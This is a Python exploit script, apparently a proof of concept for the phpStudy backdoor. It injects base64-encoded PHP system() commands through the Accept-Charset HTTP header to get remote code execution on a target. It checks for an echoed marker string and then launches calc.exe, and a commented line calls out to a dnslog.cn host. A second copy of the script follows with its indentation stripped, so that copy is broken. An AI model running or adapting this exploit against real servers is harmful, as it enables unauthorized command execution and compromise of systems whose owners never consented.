tennc/phpstudy-rce-v3.py

## phpstudy-rce-v3.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: tennc
# date: 2019年9月23日

import sys
import base64
import requests

# url = str(sys.argv[1])
# poc = str(sys.argv[2])
url = r"http://192.168.1.7/l.php"  # 这里填写目标地址
# poc = r"system('ping fy3u12.dnslog.cn');"  # 这里是dnslog.cn的地址，需要打开自己获取一个二级域名，然后修改这里的，之后就可以进行测试了，如果存在问题，dnslog.cn这里就能看到相应的信息
# poc = "c3lzdGVtKCdjYWxjLmV4ZScpOw==" ==> system('calc.exe');
poc = r"system('echo ac59075b964b0715');"  # 这个是直接输出到网页，然后脚本检查关键词是否存在，存在即有漏洞，否则，不存在


def check():
    headers = {
        'User-Agent': r'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.17 Safari/537.36',
        'Accept': r'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
        'Accept-Language': r'zh-CN,zh;q=0.9,en;q=0.8',
        'Accept-Encoding': r'gzip,deflate',
        'Accept-Charset': str((base64.b64encode(poc.encode('utf-8'))), "utf-8")}

    temp = requests.get(url, headers=headers)
    print("开始测试")
    if "ac59075b964b0715" in temp.text:
        print("报告老大存在漏洞")
        poc1 = r"system('calc.exe');"  # 命令
        headers = {
            'User-Agent': r'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.17 Safari/537.36',
            'Accept': r'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
            'Accept-Language': r'zh-CN,zh;q=0.9,en;q=0.8',
            'Accept-Encoding': r'gzip,deflate',
            'Accept-Charset': str((base64.b64encode(poc1.encode('utf-8'))), "utf-8")}

        temp = requests.get(url, headers=headers)
        print("报告首长，已经发射导弹。")
        # print(poc)
        # print(str((base64.b64encode(poc.encode('utf-8'))), "utf-8"))
        # print(temp.text)
    else:
        print("error!!")


if __name__ == '__main__':
    check()
	#!/usr/bin/env python3
	# -- coding: utf-8 --
	# author: tennc
	# date: 2019年9月23日

	import sys
	import base64
	import requests

	# url = str(sys.argv[1])
	# poc = str(sys.argv[2])
	url = r"http://192.168.1.7/l.php" # 这里填写目标地址
	# poc = r"system('ping fy3u12.dnslog.cn');" # 这里是dnslog.cn的地址，需要打开自己获取一个二级域名，然后修改这里的，之后就可以进行测试了，如果存在问题，dnslog.cn这里就能看到相应的信息
	# poc = "c3lzdGVtKCdjYWxjLmV4ZScpOw==" ==> system('calc.exe');
	poc = r"system('echo ac59075b964b0715');" # 这个是直接输出到网页，然后脚本检查关键词是否存在，存在即有漏洞，否则，不存在


	def check():
	headers = {
	'User-Agent': r'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.17 Safari/537.36',
	'Accept': r'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3',
	'Accept-Language': r'zh-CN,zh;q=0.9,en;q=0.8',
	'Accept-Encoding': r'gzip,deflate',
	'Accept-Charset': str((base64.b64encode(poc.encode('utf-8'))), "utf-8")}

	temp = requests.get(url, headers=headers)
	print("开始测试")
	if "ac59075b964b0715" in temp.text:
	print("报告老大存在漏洞")
	poc1 = r"system('calc.exe');" # 命令
	headers = {
	'User-Agent': r'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.17 Safari/537.36',
	'Accept': r'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3',
	'Accept-Language': r'zh-CN,zh;q=0.9,en;q=0.8',
	'Accept-Encoding': r'gzip,deflate',
	'Accept-Charset': str((base64.b64encode(poc1.encode('utf-8'))), "utf-8")}

	temp = requests.get(url, headers=headers)
	print("报告首长，已经发射导弹。")
	# print(poc)
	# print(str((base64.b64encode(poc.encode('utf-8'))), "utf-8"))
	# print(temp.text)
	else:
	print("error!!")


	if __name__ == '__main__':
	check()